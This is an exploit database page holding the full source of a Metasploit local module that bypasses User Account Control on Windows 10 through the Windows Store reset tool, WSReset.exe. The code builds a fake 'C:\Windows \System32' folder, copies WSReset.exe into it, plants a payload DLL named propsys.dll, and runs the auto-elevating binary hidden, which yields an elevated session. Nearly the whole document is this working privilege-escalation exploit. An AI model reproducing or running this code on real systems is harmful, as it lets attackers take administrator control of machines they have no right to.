Microsoft Windows 10 UAC Protection Bypass Via Windows Store

Credit: timwr
Risk: Medium
Local: Yes
Remote: No

## # This module requires Metasploit: # Current source: ## class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Post::Windows::Priv include Post::Windows::Runas def initialize(info = {}) super( update_info( info, 'Name' => 'Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)', 'Description' => %q{ This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool is run with the "autoElevate" property set to true, however it can be moved to a new Windows directory containing a space (C:\Windows \System32\) where, upon execution, it will load our payload dll (propsys.dll). }, 'License' => MSF_LICENSE, 'Author' => [ 'ACTIVELabs', # discovery 'sailay1996', # poc 'timwr', # metasploit module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [[ 'Automatic', {} ]], 'DefaultTarget' => 0, 'DefaultOptions' => { 'EXITFUNC' => 'process', 'WfsDelay' => 15 }, 'DisclosureDate' => 'Aug 22 2019', 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ], }, 'References' => [ ['URL', ''], ['URL', ''], ['URL', ''], ], ) ) end def check if sysinfo['OS'] =~ /Windows 10/ && is_uac_enabled? && exists?("C:\\Windows\\System32\\WSReset.exe") return CheckCode::Appears end CheckCode::Safe end def exploit if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') end # Make sure we have a sane payload configuration if sysinfo['Architecture'] != payload.arch.first fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target') end check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end exploit_win_dir = "C:\\Windows \\" exploit_dir = "C:\\Windows \\System32\\" exploit_file = exploit_dir + "WSReset.exe" unless exists? exploit_win_dir print_status("Creating directory '#{exploit_win_dir}'...") session.fs.dir.mkdir(exploit_win_dir) end unless exists? exploit_dir print_status("Creating directory '#{exploit_dir}'...") session.fs.dir.mkdir(exploit_dir) end unless exists? exploit_file session.fs.file.copy("C:\\Windows\\System32\\WSReset.exe", exploit_file) end payload_dll = "C:\\Windows \\System32\\propsys.dll" print_status("Creating payload '#{payload_dll}'...") payload = generate_payload_dll write_file(payload_dll, payload) print_status("Executing WSReset.exe...") begin session.sys.process.execute("cmd.exe /c \"#{exploit_file}\"", nil, {'Hidden' => true}) rescue ::Exception => e print_error(e.to_s) end print_warning("This exploit requires manual cleanup of the '#{exploit_win_dir}' and '#{exploit_dir}' directories!") end def check_permissions! unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin # is_in_admin_group can be nil, true, or false print_status('UAC is Enabled, checking level...') vprint_status('Checking admin status...') admin_group = is_in_admin_group? if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end end

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019,


Back to Top